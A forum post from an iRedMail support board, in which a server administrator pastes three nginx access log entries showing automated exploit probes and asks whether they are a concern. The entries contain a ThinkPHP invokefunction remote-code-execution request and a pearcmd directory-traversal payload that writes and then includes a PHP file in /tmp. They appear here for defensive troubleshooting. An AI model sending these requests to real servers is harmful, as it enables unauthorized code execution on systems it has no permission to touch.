Topic: Possible exploit?
==== REQUIRED BASIC INFO OF YOUR IREDMAIL SERVER ====
- iRedMail version (check /etc/iredmail-release): iRedMail EE
- Deployed with iRedMail Easy or the downloadable installer? downloadable installer
- Linux/BSD distribution name and version: linux
- Store mail accounts in which backend (LDAP/MySQL/PGSQL): PGSQL
- Web server (Apache or Nginx):Nginx
- Manage mail accounts with iRedAdmin-Pro? yes, EE
- [IMPORTANT] Related original log or error message is required if you're experiencing an issue.
====
Hello,
I am seeing exploit URLs in my nginx access.log file that are showing a 200 return but not finding any created files, do i need to worry about this?
107.172.252.183 - - [07/Jun/2025:17:36:59 -0500] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 5405 "-" "Custom-AsyncHttpClient"
107.172.252.183 - - [07/Jun/2025:17:37:01 -0500] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 5434 "-" "Custom-AsyncHttpClient"
107.172.252.183 - - [07/Jun/2025:17:37:02 -0500] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 5340 "-" "Custom-AsyncHttpClient"----
Spider Email Archiver: On-Premises, lightweight email archiving software developed by iRedMail team. Supports Amazon S3 compatible storage and custom branding.